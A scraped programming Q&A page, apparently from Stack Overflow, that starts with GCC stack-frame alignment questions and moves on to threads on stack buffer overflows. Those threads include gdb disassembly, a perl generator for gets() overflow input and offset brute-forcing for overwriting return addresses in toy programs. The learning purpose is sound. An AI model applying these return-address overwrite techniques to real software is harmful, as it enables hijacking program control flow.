This question already has answers here:
Why is GCC pushing an extra return address on the stack?
(2 answers)
Waste in memory allocation for local variables
(2 answers)
Closed 4 years ago.
I wrote below code.
int main (int argc, char *argv[])
{
char *uargv[3];
uargv[0] = "echo";
uargv[1] = "hello!";
uargv[2] = 0;
exec("echo", uargv);
exit();
}
And compiled with gcc 5.4.
Below is assembly code of above program.
0x00: lea 0x4(%esp),%ecx
0x04: and $0xfffffff0,%esp
0x07: pushl -0x4(%ecx)
0x0a: push %ebp
0x0b: mov %esp,%ebp
0x0d: push %ecx
0x0e: sub $0x14,%esp
0x11: movl $0x7c3,-0x14(%ebp)
0x18: movl $0x7c8,-0x10(%ebp)
0x1f: movl $0x0,-0xc(%ebp)
0x26: sub $0x8,%esp
0x29: lea -0x14(%ebp),%eax
0x2c: push %eax
0x2d: push $0x7c3
0x32: call 2ce <exec>
0x37: add $0x10,%esp
0x3a: call 296 <exit>
I can't understand three part of above assembly code.
First, in the code that is in 0x00, 0x04, 0x07, 0x0a, 0x0b, 0x0d works as follows.
0x00: save ebp+4 to ecx, and it is address of argc.
0x04: align esp with 16 byte
0x07: push ecx-4 to stack, and it is return address.
0x0a ~ 0x0b: setup ebp
0x0d: push ecx to stack, and it is address of argc.
I wonder why it push return address again and why it push address of argc.
It was my first question.
Second, it allocate stack in 0x0e instruction for local variable, uargv.
However, the size of uargv is only 12 byte.
But it allocate 20 byte.
If it is because of 16 byte alignment, why local variables are saved in esp+4, not esp (ebp+0x14 is same with esp+4).
Third, why 0x26 instruction allocate more 8 byte for stack?
More space in stack is no needed, because arguments of exec are saved in stack by push instruction.
Thank you.
Related
I am trying to replicate a stack buffer overflow. This is my code
#include <stdio.h>
int main(int argc, char *argv[]) {
char x[1];
gets(x);
printf("%s\n", x);
}
I am compiling this on a 32 bit machine, which means each memory address is 4 bytes long. Since each character is 1 byte (verified using sizeof), I am expecting a stack buffer overflow when I enter "AAAAA" as input (1 byte more than what x can hold). However, nothing happens till I enter 13 As, at which point I get an "Illegal Instruction" error. 14 As results in a "Segmentation fault".
Questions
Why am I not getting a segmentation fault at 5 As?
What is the difference between Illegal Instruction and Segmentation Fault?
What is a good tool (other than gdb) to visualize the stack?
I've looked at Trouble replicating a stack buffer overflow exploit, but I had trouble understanding the answer.
Here's my assembly dump:
(gdb) disassemble main
Dump of assembler code for function main:
0x0804844d <+0>: push %ebp
0x0804844e <+1>: mov %esp,%ebp
0x08048450 <+3>: and $0xfffffff0,%esp
0x08048453 <+6>: sub $0x20,%esp
0x08048456 <+9>: lea 0x1f(%esp),%eax
0x0804845a <+13>: mov %eax,(%esp)
0x0804845d <+16>: call 0x8048310 <gets#plt>
=> 0x08048462 <+21>: lea 0x1f(%esp),%eax
0x08048466 <+25>: mov %eax,(%esp)
0x08048469 <+28>: call 0x8048320 <puts#plt>
0x0804846e <+33>: leave
0x0804846f <+34>: ret
End of assembler dump.
the stack is 16-byte aligned right after the main function executed ( at line 3 ). so you cannot just calculate exact address for saved return address, you can just try from 5 bytes to 21 bytes.
Illegal instruction is such bytes which didn't match with any defined instruction. every instruction is represented in machine code (Ex: push ebp is 0x55 , etc) but for example, 0xff 0xff is not matched with any instruction in x86 machine. but segmentation fault is occured when any memory access is invalid.
I have a buffer overflow problem that I need to solve. Below is the problem, at the bottom is my question:
#include <stdio.h>
#include <string.h>
void lan(void) {
printf("Your loyalty to your captors is touching.\n");
}
void vulnerable(char *str) {
char buf[LENGTH]; //Length is not given
strcpy(buf, str); //str to fixed size buf (uh-oh)
}
int main(int argc, char **argv) {
if (argc < 2)
return -1;
vulnerable(argv[1]);
return 0;
}
(gdb) disass vulnerable
0x08048408: push %ebp
0x08048409: mov %esp, %ebp
0x0804840b: sub $0x88, %esp
0x0804840e: mov 0x8(%ebp), %eax
0x08048411: mov %eax, 0x4(%esp)
0x08048415: lea -0x80(%ebp), %eax
0x08048418: mov %eax, (%esp)
0x0804841b: call 0x8048314 <strcpy>
0x08048420: leave
0x08048421: ret
End of assembler dump.
(gdb) disass lan
0x080483f4: push %ebp
0x080483f5: mov %esp, %ebp
0x080483f7: sub $0x4, %esp
0x080483fa: movl $0x8048514, (%esp)
0x08048401: call 0x8048324 <puts>
0x08048406: leave
0x08048407: ret
End of assembler dump.
Then we have the following info:
(gdb) break *0x08048420
Breakpoint 1 at 0x8048420
(gdb) run 'perl -e' print "\x90" x Length' 'AAAABBBBCCCCDDDDEEEE'
Breakpoint 1, 0x08048420 in vulnerable
(gdb) info reg $ebp
ebp 0xffffd61c 0xffffd61c
(gdb) # QUESTION: Where in memory does the buf buffer start?
(gdb) cont
Program received signal SIGSEGV, Segmentation fault.
And finally, the perl command is a shorthand for writing out LENGTH copies of the character 0x90.
I've done a couple of problems of this sort before, but what stops me here is the following question: "By looking at the assembly code, what is the value of LENGTH?"
I'm not sure how to find that from the given assembly code. What I do know is.. the buffer that we're writing into is on the stack at the location -128(%ebp) (where -128 is a decimal number). However, I'm not sure where to go from here to get the length of the buffer.
Let's look at your vulnerable function.
First the compiler creates a frame and reserves 0x88 bytes on the stack:
0x08048408: push %ebp
0x08048409: mov %esp, %ebp
0x0804840b: sub $0x88, %esp
Then it puts two values onto the stack:
0x0804840e: mov 0x8(%ebp), %eax
0x08048411: mov %eax, 0x4(%esp)
0x08048415: lea -0x80(%ebp), %eax
0x08048418: mov %eax, (%esp)
And the last thing it does before returning is calling strcpy(buf, str):
0x0804841b: call 0x8048314 <strcpy>
0x08048420: leave
0x08048421: ret
So we can deduce that the two values it put on the stack are the arguments to strcpy.
mov 0x8(%ebp) would be char *str and lea -0x80(%ebp) would be a pointer to char buf[LENGTH].
Therefore, we know that your buffer starts at -0x80(%ebp), so it has a length of 0x80 = 128 bytes assuming the compiler didn't waste any space.
What I do know is.. the buffer that we're writing into is on the stack
at the location -128(%ebp)
Since the local variables end at %ebp, and you only have a single local variable which is buffer itself, you can conclude that it has length at most 128. It may be shorter, if the compiler added some padding for alignment.
I was trying to understand disassembled code of the following function.
void func(char *string) {
printf("the string is %s\n",string);
}
The disassembled code is given below.
1) 0x080483e4 <+0>: push %ebp
2) 0x080483e5 <+1>: mov %esp,%ebp
3) 0x080483e7 <+3>: sub $0x18,%esp
4) 0x080483ea <+6>: mov $0x80484f0,%eax
5) 0x080483ef <+11>: mov 0x8(%ebp),%edx
6) 0x080483f2 <+14>: mov %edx,0x4(%esp)
7) 0x080483f6 <+18>: mov %eax,(%esp)
8) 0x080483f9 <+21>: call 0x8048300 <printf#plt>
Could anyone tell me what lines 4-7 means (not the literal explanation). Also why 24 bytes are allocated on stack on line 3?
Basically what happens here:
4) 0x080483ea <+6> : mov $0x80484f0,%eax
Load the address of "the string is %s\n" into eax.
5) 0x080483ef <+11>: mov 0x8(%ebp),%edx
Move the argument string into edx.
6) 0x080483f2 <+14>: mov %edx,0x4(%esp)
Push the value of edx or string into the stack, second argument of printf
7) 0x080483f6 <+18>: mov %eax,(%esp)
Push the value of eax or "the string is %s\n" into the stack, first argument of printf, and then it will call printf.
sub $0x18,%esp is not necessary since the function has no local variables, gcc seems to like making extra space but honestly I don't know why.
The stack is a continuous region of memory that starts at a higher address and ends at esp. Whenever you need your stack to grow, you subtract from esp. Every function can have a frame on the stack. It is the part of the stack that the function owns and is responsible for cleaning after it is done. It means, when the function starts it decreases esp to create its frame. When it ends it increases it back. ebp usually points to the beginning of your frame.
Initially this function pushs ebp to tha stack so that it can be stored when the function ends, sets esp = ebp to mark the begin of its frame and allocate 28 bytes. Why 28? For alignment. It already allocated 4 bytes for the ebp. 4 + 28 = 32.
The lines 4-7 will prepare the call to printf. It expects its arguments to be on the frame of the caller. When we read mov 0x8(%ebp), %edx, we are taking our argument char* string from the caller's frame. printf will do the same.
Note that your assembly is missing a leave and a ret instructions to clear the stack and return to the caller.
I am trying to reproduce the stackoverflow results that I read from Aleph One's article "smashing the stack for fun and profit"(can be found here:http://insecure.org/stf/smashstack.html).
Trying to overwrite the return address doesn't seem to work for me.
C code:
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
//Trying to overwrite return address
ret = buffer1 + 12;
(*ret) = 0x4005da;
}
void main() {
int x;
x = 0;
function(1,2,3);
x = 1;
printf("%d\n",x);
}
disassembled main:
(gdb) disassemble main
Dump of assembler code for function main:
0x00000000004005b0 <+0>: push %rbp
0x00000000004005b1 <+1>: mov %rsp,%rbp
0x00000000004005b4 <+4>: sub $0x10,%rsp
0x00000000004005b8 <+8>: movl $0x0,-0x4(%rbp)
0x00000000004005bf <+15>: mov $0x3,%edx
0x00000000004005c4 <+20>: mov $0x2,%esi
0x00000000004005c9 <+25>: mov $0x1,%edi
0x00000000004005ce <+30>: callq 0x400564 <function>
0x00000000004005d3 <+35>: movl $0x1,-0x4(%rbp)
0x00000000004005da <+42>: mov -0x4(%rbp),%eax
0x00000000004005dd <+45>: mov %eax,%esi
0x00000000004005df <+47>: mov $0x4006dc,%edi
0x00000000004005e4 <+52>: mov $0x0,%eax
0x00000000004005e9 <+57>: callq 0x400450 <printf#plt>
0x00000000004005ee <+62>: leaveq
0x00000000004005ef <+63>: retq
End of assembler dump.
I have hard coded the return address to skip the x=1; code line, I have used a hard coded value from the disassembler(address : 0x4005da). The intent of this exploit is to print 0, but instead it is printing 1.
I have a very strong feeling that "ret = buffer1 + 12;" is not the address of the return address. If this is the case, how can I determine the return address, is gcc allocating more memory between the return address and the buffer.
Here's a guide I wrote for a friend a while back on performing a buffer overflow attack using gets. It goes over how to get the return address and how to use it to write over the old one:
Our knowledge of the stack tells us that the return address appears on the stack after the buffer you're trying to overflow. However, how far after the buffer the return address appears depends on the architecture you're using. In order to determine this, first write a simple program and inspect the assembly:
C code:
void function()
{
char buffer[4];
}
int main()
{
function();
}
Assembly (abridged):
function:
pushl %ebp
movl %esp, %ebp
subl $16, %esp
leave
ret
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
call function
...
There are several tools that you can use to inspect the assembly code. First, of course, is
compiling straight to assembly output from gcc using gcc -S main.c. This can be difficult to read since there are little to no hints for what code corresponds to the original C code. Additionally, there is a lot of boilerplate code that can be difficult to sift through. Another tool to consider is gdbtui. The benefit of using gdbtui is that you can inspect the assembly source while running the program and manually inspect the stack throughout the execution of the program. However, it has a steep learning curve.
The assembly inspection program that I like best is objdump. Running objdump -dS a.out gives the assembly source with the context from the original C source code. Using objdump, on my computer the offset of the return address from the character buffer is 8 bytes.
This function function takes the return address and increments 7 to it. The instruction that
the return address originally pointed to is 7 bytes in length, so adding 7 makes the return address point to the instruction immediately after the assignment.
In the example below, I overwrite the return address to skip the instruction x = 1.
simple C program:
void function()
{
char buffer[4];
/* return address is 8 bytes beyond the start of the buffer */
int *ret = buffer + 8;
/* assignment instruction we want to skip is 7 bytes long */
(*ret) += 7;
}
int main()
{
int x = 0;
function();
x = 1;
printf("%d\n",x);
}
Main function (x = 1 at 80483af is seven bytes long):
8048392: 8d4c2404 lea 0x4(%esp),%ecx
8048396: 83e4f0 and $0xfffffff0,%esp
8048399: ff71fc pushl -0x4(%ecx)
804839c: 55 push %ebp
804839d: 89e5 mov %esp,%ebp
804839f: 51 push %ecx
80483a0: 83ec24 sub $0x24,%esp
80483a3: c745f800000000 movl $0x0,-0x8(%ebp)
80483aa: e8c5ffffff call 8048374 <function>
80483af: c745f801000000 movl $0x1,-0x8(%ebp)
80483b6: 8b45f8 mov -0x8(%ebp),%eax
80483b9: 89442404 mov %eax,0x4(%esp)
80483bd: c70424a0840408 movl $0x80484a0,(%esp)
80483c4: e80fffffff call 80482d8 <printf#plt>
80483c9: 83c424 add $0x24,%esp
80483cc: 59 pop %ecx
80483cd: 5d pop %ebp
We know where the return address is and we have demonstrated that changing it can affect the
code that is run. A buffer overflow can do the same thing by using gets and inputing the right character string so that the return address is overwritten with a new address.
In a new example below we have a function function which has a buffer filled using gets. We also have a function uncalled which never gets called. With the correct input, we can run uncalled.
#include <stdio.h>
#include <stdlib.h>
void uncalled()
{
puts("uh oh!");
exit(1);
}
void function()
{
char buffer[4];
gets(buffer);
}
int main()
{
function();
puts("program secure");
}
To run uncalled, inspect the executable using objdump or similar to find the address of the entry point of uncalled. Then append the address to the input buffer in the right place so that it overwrites the old return address. If your computer is little-endian (x86, etc.) , you need to swap the endianness of the address.
In order to do this correctly, I have a simple perl script below, which generates the input that will cause the buffer overflow that will overwrite the return address. It takes two arguments, first it takes the new return address, and second it takes the distance (in bytes) from the beginning of the buffer to the return address location.
#!/usr/bin/perl
print "x"x#ARGV[1]; # fill the buffer
print scalar reverse pack "H*", substr("0"x8 . #ARGV[0] , -8); # swap endian of input
print "\n"; # new line to end gets
You need to examine the stack to determine if buffer1+12 is actually the right address to be modifying. This sort of stuff isn't exactly very portable.
I'd probably also place some eye catchers in the code so you can see where the buffers are on the stack in relation to the return address:
char buffer1[5] = "1111";
char buffer2[10] = "2222";
You can figure this out by printing out the stack. Add code like this:
int* pESP;
__asm mov pESP, esp
The __asm directive is Visual Studio specific. Once you have the address of the stack you can print it out and see what is in there. Note that the stack will change when you do things or make calls, so you have to save the whole block of memory at once by first copying the memory at the stack address to an array, then you print out the array.
What you will find is all kinds of garbage having to do with the stack frame and various runtime checks. By default VS will put guard code in the stack to prevent exactly what you are trying to do. If you print out the assembly listing for "function" you will see this. You need to set a compiler switches to turn all this stuff off.
As an alternative to the methods suggested in other answers, you can figure this sort of thing out using gdb. To make the output a bit easier to read, I remove the buffer2 variable, and change buffer1 to 8 bytes so things are more aligned. We will also compile in 32 bit more do make it easier to read the addresses, and turn debugging on(gcc -m32 -g).
void function(int a, int b, int c) {
char buffer1[8];
char *ret;
so let's print the address of buffer1:
(gdb) print &buffer1
$1 = (char (*)[8]) 0xbffffa40
then let's print a bit past that and see what's on the stack.
(gdb) x/16x 0xbffffa40
0xbffffa40: 0x00001000 0x00000000 0xfecf25c3 0x00000003
0xbffffa50: 0x00000000 0xbffffb50 0xbffffa88 0x00001f3b
0xbffffa60: 0x00000001 0x00000002 0x00000003 0x00000000
0xbffffa70: 0x00000003 0x00000002 0x00000001 0x00001efc
Do a backtrace to see where the return address should be pointing:
(gdb) bt
#0 function (a=1, b=2, c=3) at foo.c:18
#1 0x00001f3b in main () at foo.c:26
and sure enough, there it is at 0xbffffa5b:
(gdb) x/x 0xbffffa5b
0xbffffa5b: 0x001f3bbf
I am trying to make the buffer exploitation example (example3.c from http://insecure.org/stf/smashstack.html) work on Debian Lenny 2.6 version. I know the gcc version and the OS version is different than the one used by Aleph One. I have disabled any stack protection mechanisms using -fno-stack-protector and sysctl -w kernel.randomize_va_space=0 arguments. To account for the differences in my setup and Aleph One's I introduced two parameters : offset1 -> Offset from buffer1 variable to the return address and offset2 -> how many bytes to jump to skip a statement. I tried to figure out these parameters by analyzing assembly code but was not successful. So, I wrote a shell script that basically runs the buffer overflow program with simultaneous values of offset1 and offset2 from (1-60). But much to my surprise I am still not able to break this program. It would be great if someone can guide me for the same. I have attached the code and assembly output for consideration. Sorry for the really long post :)
Thanks.
// Modified example3.c from Aleph One paper - Smashing the stack
void function(int a, int b, int c, int offset1, int offset2) {
char buffer1[5];
char buffer2[10];
int *ret;
ret = (int *)buffer1 + offset1;// how far is return address from buffer ?
(*ret) += offset2; // modify the value of return address
}
int main(int argc, char* argv[]) {
int x;
x = 0;
int offset1 = atoi(argv[1]);
int offset2 = atoi(argv[2]);
function(1,2,3, offset1, offset2);
x = 1; // Goal is to skip this statement using buffer overflow
printf("X : %d\n",x);
return 0;
}
-----------------
// Execute the buffer overflow program with varying offsets
#!/bin/bash
for ((i=1; i<=60; i++))
do
for ((j=1; j<=60; j++))
do
echo "`./test $i $j`"
done
done
-- Assembler output
(gdb) disassemble main
Dump of assembler code for function main:
0x080483c2 <main+0>: lea 0x4(%esp),%ecx
0x080483c6 <main+4>: and $0xfffffff0,%esp
0x080483c9 <main+7>: pushl -0x4(%ecx)
0x080483cc <main+10>: push %ebp
0x080483cd <main+11>: mov %esp,%ebp
0x080483cf <main+13>: push %ecx
0x080483d0 <main+14>: sub $0x24,%esp
0x080483d3 <main+17>: movl $0x0,-0x8(%ebp)
0x080483da <main+24>: movl $0x3,0x8(%esp)
0x080483e2 <main+32>: movl $0x2,0x4(%esp)
0x080483ea <main+40>: movl $0x1,(%esp)
0x080483f1 <main+47>: call 0x80483a4 <function>
0x080483f6 <main+52>: movl $0x1,-0x8(%ebp)
0x080483fd <main+59>: mov -0x8(%ebp),%eax
0x08048400 <main+62>: mov %eax,0x4(%esp)
0x08048404 <main+66>: movl $0x80484e0,(%esp)
0x0804840b <main+73>: call 0x80482d8 <printf#plt>
0x08048410 <main+78>: mov $0x0,%eax
0x08048415 <main+83>: add $0x24,%esp
0x08048418 <main+86>: pop %ecx
0x08048419 <main+87>: pop %ebp
0x0804841a <main+88>: lea -0x4(%ecx),%esp
0x0804841d <main+91>: ret
End of assembler dump.
(gdb) disassemble function
Dump of assembler code for function function:
0x080483a4 <function+0>: push %ebp
0x080483a5 <function+1>: mov %esp,%ebp
0x080483a7 <function+3>: sub $0x20,%esp
0x080483aa <function+6>: lea -0x9(%ebp),%eax
0x080483ad <function+9>: add $0x30,%eax
0x080483b0 <function+12>: mov %eax,-0x4(%ebp)
0x080483b3 <function+15>: mov -0x4(%ebp),%eax
0x080483b6 <function+18>: mov (%eax),%eax
0x080483b8 <function+20>: lea 0x7(%eax),%edx
0x080483bb <function+23>: mov -0x4(%ebp),%eax
0x080483be <function+26>: mov %edx,(%eax)
0x080483c0 <function+28>: leave
0x080483c1 <function+29>: ret
End of assembler dump.
The disassembly for function you provided seems to use hardcoded values of offset1 and offset2, contrary to your C code.
The address for ret should be calculated using byte/char offsets: ret = (int *)(buffer1 + offset1), otherwise you'll get hit by pointer math (especially in this case, when your buffer1 is not at a nice aligned offset from the return address).
offset1 should be equal to 0x9 + 0x4 (the offset used in lea + 4 bytes for the push %ebp). However, this can change unpredictably each time you compile - the stack layout might be different, the compiler might create some additional stack alignment, etc.
offset2 should be equal to 7 (the length of the instruction you're trying to skip).
Note that you're getting a little lucky here - the function uses the cdecl calling convention, which means the caller is responsible for removing arguments off the stack after returning from the function, which normally looks like this:
push arg3
push arg2
push arg1
call func
add esp, 0Ch ; remove as many bytes as were used by the pushed arguments
Your compiler chose to combine this correction with the one after printf, but it could also decide to do this after your function call. In this case the add esp, <number> instruction would be present between your return address and the instruction you want to skip - you can probably imagine that this would not end well.